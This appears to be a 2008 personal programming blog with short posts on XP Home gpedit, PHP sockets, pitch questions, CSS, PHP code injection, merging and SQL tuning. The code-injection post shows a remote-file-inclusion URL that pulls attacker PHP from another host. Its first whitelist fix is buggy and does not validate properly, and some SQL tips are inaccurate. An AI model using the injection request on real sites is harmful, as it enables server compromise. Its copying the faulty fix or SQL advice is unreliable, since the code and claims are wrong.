Thursday, September 4, 2008

XP HOME local security

xp HOME edition does not have local security policy setting(gpedit.msc), here is a solution:
1、Copy files from XP Pro (in “C:\WINDOWS\system32”) gpedit.msc、fde.dll、gpedit.dll、 gptext.dll、wsecedit.dll to HOME “C:\WINDOWS\system32”
2、Start->run: run following command “regsvr32 fde.dll”、“regsvr32 gpedit.dll”、“regsvr32 gptext.dll”、“regsvr32 wsecedit.dll”
3、Copy all the *.adm files in XP Pro “C:\WINDOWS\INF” to HOME edition in “C:\WINDOWS\INF”
4、Last step, run “gpedit.msc”, you will see the security policy console

Friday, February 29, 2008

PHP Socket Basic



<?
// set some variables
$host = "192.168.1.99";
$port = 1234;
// don't timeout!
set_time_limit(0);
// create socket
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die("Could not create
socket\n");
// bind socket to port
$result = socket_bind($socket, $host, $port) or die("Could not bind to
socket\n");
// start listening for connections
$result = socket_listen($socket, 3) or die("Could not set up socket
listener\n");
// accept incoming connections
// spawn another socket to handle communication
$spawn = socket_accept($socket) or die("Could not accept incoming
connection\n");
// read client input
$input = socket_read($spawn, 1024) or die("Could not read input\n");
// clean up input string
$input = trim($input);
// reverse client input and send back
$output = strrev($input) . "\n";
socket_write($spawn, $output, strlen ($output)) or die("Could not write
output\n");
// close sockets
socket_close($spawn);
socket_close($socket);
?>

Monday, February 11, 2008

Business Presentation Tips

http://www.feld.com/blog/archives/2004/06/the_torturous_w.html

Following are the questions to address.

1) WHAT IS YOUR VISION?
- What is your big vision?
- What problem are you solving and for whom?
- Where do you want to be in the future?

2) WHAT IS YOUR MARKET OPPORTUNITY AND HOW BIG IS IT?
- How big is the market opportunity you are pursuing and how fast is it growing?
- How established (or nascent) is the market?
- Do you have a credible claim on being one of the top two or three players in the market?

3) DESCRIBE YOUR PRODUCT/SERVICE
- What is your product/service?
- How does it solve your customer’s problem?
- What is unique about your product/service?

4) WHO IS YOUR CUSTOMER?
- Who are your existing customers?
- Who is your target customer?
- What defines an "ideal" customer prospect?
- Who actually writes you the check?
- Use specific customer examples where possible.

5) WHAT IS YOUR VALUE PROPOSITION?
- What is your value proposition to the customer?
- What kind of ROI can your customer expect by using buying your product/service?
- What pain are you eliminating?
- Are you selling vitamins, aspirin or antibiotics? (I.e. a luxury, a nice-to-have, or a need-to-have)

6) HOW ARE YOU SELLING?
- What does the sales process look like and how long is the sales cycle?
- How will you reach the target customer? What does it cost to "acquire" a customer?
- What is your sales, marketing and distribution strategy?
- What is the current sales pipeline?

7) HOW DO YOU ACQUIRE CUSTOMERS?
- What is your cost to acquire a customer?
- How will this acquisition cost change over time and why?
- What is the lifetime value of a customer?

8) WHO IS YOUR MANAGEMENT TEAM?
- Who is the management team?
- What is their experience?
- What pieces are missing and what is the plan for filling them?

9) WHAT IS YOUR REVENUE MODEL?
- How do you make money?
- What is your revenue model?
- What is required to become profitable?

10) WHAT STAGE OF DEVELOPMENT ARE YOU AT?
- What is your stage of development? Technology/product? Team? Financial metrics/revenue?
- What has been the progress to date (make reality and future clear)?
- What are your future milestones?

11) WHAT ARE YOUR PLANS FOR FUND RAISING?
- What funds have already been raised?
- How much money are you raising and at what valuation?
- How will the money be spent?
- How long will it last and where will the company "be" on its milestones progress at that time?
- How much additional funding do you anticipate raising & when?

12) WHO IS YOUR COMPETITION?
- Who is your existing & likely competition?
- Who is adjacent to you (in the market) that could enter your market (and compete) or could be a co-opted partner?
- What are their strengths/weaknesses?
- Why are you different?

13) WHAT PARTNERSHIPS DO YOU HAVE?
- Who are your key distribution and technology partners (current & future)?
- How dependent are you on these partners?

14) HOW DO YOU FIT WITH THE PROSPECTIVE INVESTOR?
- How does this fit w/ the investor’s portfolio and expertise?
- What synergies, competition exist with the investor’s existing portfolio?

15) OTHER
- What assumptions are key to the success of the business?
- What "gotchas" could change the business overnight? New technologies, new market entrants, change in standards or regulations?
- What are your company’s weak links?

Monday, February 4, 2008

Make a container's border work!

div.container {
border: 1px solid #000000;
overflow: hidden;
width: 100%;
}

div.left {
width: 45%;
float: left;
}

div.right {
width: 45%;
float: right;
}

Friday, February 1, 2008

Code Injection Vulnerabilities Explained

Introduction:

There has been a sudden increase of attacks on sites that have Code Injection vulnerabilites. Code Injection is a term used when code is injected straight into a program/script from an outside source for execution at some point in time. These type of vulnerabilities may be many times worse than any other vulnerability, since the security of the website, and possibly of the server, is compromised.


Example:

This example will help you understand what exactly a Code Injection Vulnerability looks like in it's simplest form, and unfortunately, this snipet is actually used in quite a few websites.


... html header ...

<?php
include ('$page');
?>

... html footer ...

Note: There is no php code in the header or footer, it is just HTML.

To some, this is obviously a big mistake. The '$page' variable is never checked, so an attacker can choose what to include. So how does one exploit the above code?



Example Exploit:

An attacker can create a 'txt' file on another server and have it included in the above example. If the attacker puts php code in this 'txt' file, it will be executed on the exploited host.


<?php
phpinfo();
?>


Let's say the vulnerable code is located at 'http://domain/index.php', and the 'txt' file is located at 'http://domain2/code.txt', then the attacker would enter something like this into his browser:


http://domain/index.php?page=http://domain2/code.txt

Then end result would have the exploited website execute the command 'phpinfo()' in between the header and footer where the php include is located.





Explaination:

If you had no problem understanding why this would happen, feel free to skip this section.


The 'include()' function takes data from another file, that is defined in the brackets (), and places the data in the area that the include is executed. So let us run through the program in our minds, and assume the url mentioned above is entered into a browser. In the url, it defines the variable $page as containing 'http://domain2/code.txt', so let us replaces all $page variables with this string:


... html header ...

<?php
include ('http://domain2/code.txt');
?>

... html footer ...

Now the include function takes the code from the url/file mentioned, and places it where the include was called, so the result would be:



... html header ...

<?php
phpinfo();
?>


... html footer ...

Now this is what the server ends up processing. What happens here is the header is displayed, then the php command; 'phpinfo()' is executed, followed by the footer at the end.



What can happen:

The above example had harmless code being executed, but the attacker can execute more malicious code.




  • An attacker can output the contents of any php file raw to the browser, where he can possibly obtain an sql login/password to your database.


  • An attacker can use your website to send out large amounts of spam to various email addresses.
  • An attacker can deface your website.
  • An attacker can obtain private information.
  • An attacker may gain access to the whole server.


This is why it is important to secure your website, and not leave such vulnerabilities open for attack.



Solution:

There is a very simple solution to the above example, and that is to check the variable. In the above example, 99% of the time you know what values $page should be, and therefore can check to see if that is the case.



... html header ...

<?php
//list of valid pages
$pages=array("games/index.html", "news/news.html", "games/1.html");

//check $page variable
$valid=false;
for ($i=0; $i<sizeof($pages) || !$valid; $i++) {
if ($page==$page[$i]) {
$valid=true;
}
}
if ($valid) include($page);
if (!$valid) include($pages[0]); // include the first page if not valid
?>

... html footer ...


Another Solution:

Another solution is to check for invalid characters and setup all the page files in a seperate directory, all together.


Example of where the pages are placed:



  • pages/games.html

  • pages/news.html
  • pages/games-1.html



Code:
... html header ...

<?php
$invalidChars=array("/",".","\\","\"",";");
$page=str_replace($invalidChars,"",$page);
include ("pages/".$page.".html");
?>

... html footer ...

Saturday, January 19, 2008

Merge in Source Control

In theory, this could be very difficult:

* What happens if Jane changed some of the same lines that Joe changed, but in different ways?
* What happens if Jane's changes are functionally incompatible with Joe's?
* What happens if Jane made a change to a C# function which Joe has deleted?
* What happens if Jane changed 80 percent of the lines in the file?
* What happens if Jane and Joe each changed 80 percent of the lines in the file, but each did so for entirely different reasons?
* What happens if Jane's intent was not clear and she cannot be reached to ask questions?

Friday, January 18, 2008

SQL Performance

* One: only "tune" sql after code is confirmed as working correctly.

* Two: ensure repeated sql statements are written absolutely identically to facilate efficient reuse: re-parsing can often be avoided for each subsequent use.

Writing best practices: all sql verbs in upper-case i.e. SELECT; separate all words with a single space; all sql verbs begin on a new line; sql verbs aligned right or left within the initial verb; set and maintain a table alias standard; use table aliases and when a query involves more than one table prefix all column names with their aliases. Whatever you do, be consistent.

* Three: code the query as simply as possible i.e. no unnecessary columns are selected, no unnecessary GROUP BY or ORDER BY.

* Four: it is the same or faster to SELECT by actual column name(s). The larger the table the more likely the savings.
Use:
SELECT customer_id, last_name, first_name, street, city FROM customer; Rather than:
SELECT * FROM customer;

* Five: do not perform operations on DB objects referenced in the WHERE clause:
Use:
SELECT client, date, amount FROM sales WHERE amount > 0;
Rather than:
SELECT client, date, amount FROM sales WHERE amount!= 0;

* Six: avoid a HAVING clause in SELECT statements - it only filters selected rows after all the rows have been returned. Use HAVING only when summary operations applied to columns will be restricted by the clause. A WHERE clause may be more efficient.
Use:
SELECT city FROM country WHERE city!= 'Vancouver' AND city!= 'Toronto'; GROUP BY city;
Rather than:
SELECT city FROM country GROUP BY city HAVING city!= 'Vancouver' AND city!= 'Toronto';

* Seven: when writing a sub-query (a SELECT statement within the WHERE or HAVING clause of another sql statement):
-- use a correlated (refers to at least one value from the outer query) sub-query when the return is relatively small and/or other criteria are efficient i.e. if the tables within the sub-query have efficient indexes.
-- use a noncorrelated (does not refer to the outer query) sub-query when dealing with large tables from which you expect a large return (many rows) and/or if the tables within the sub-query do not have efficient indexes.
-- ensure that multiple sub-queries are in the most efficient order.
-- remember that rewriting a sub-query as a join can sometimes increase efficiency.

* Eight: minimise the number of table lookups especially if there are sub-query SELECTs or multicolumn UPDATEs.

* Nine: when doing multiple table joins consider the benefits/costs for each of EXISTS, IN, and table joins. Depending on your data one or another may be faster.
Note: IN is usually the slowest.
Note: when most of the filter criteria are in the sub-query IN may be more efficient; when most of the filter criteria are in the parent-query EXISTS may be more efficient.

* Ten: where possible use EXISTS rather than DISTINCT.

* Eleven: where possible use a non-column expression (putting the column on one side of the operator and all the other values on the other). Non-column expressions are often processed earlier thereby speeding the query.
Use:
WHERE SALES < 1000/(1 + n);
Rather than:
WHERE SALES + (n * SALES) < 1000;

* Twelve: the most efficient method for storing large binary objects, i.e. multimedia objects, is to place them in the file system and place a pointer in the DB.

* Thirteen: Use inner-joint rather than left/right/cross joint

* Fourteen: In most of cases, GROUP+HAVING < WHERE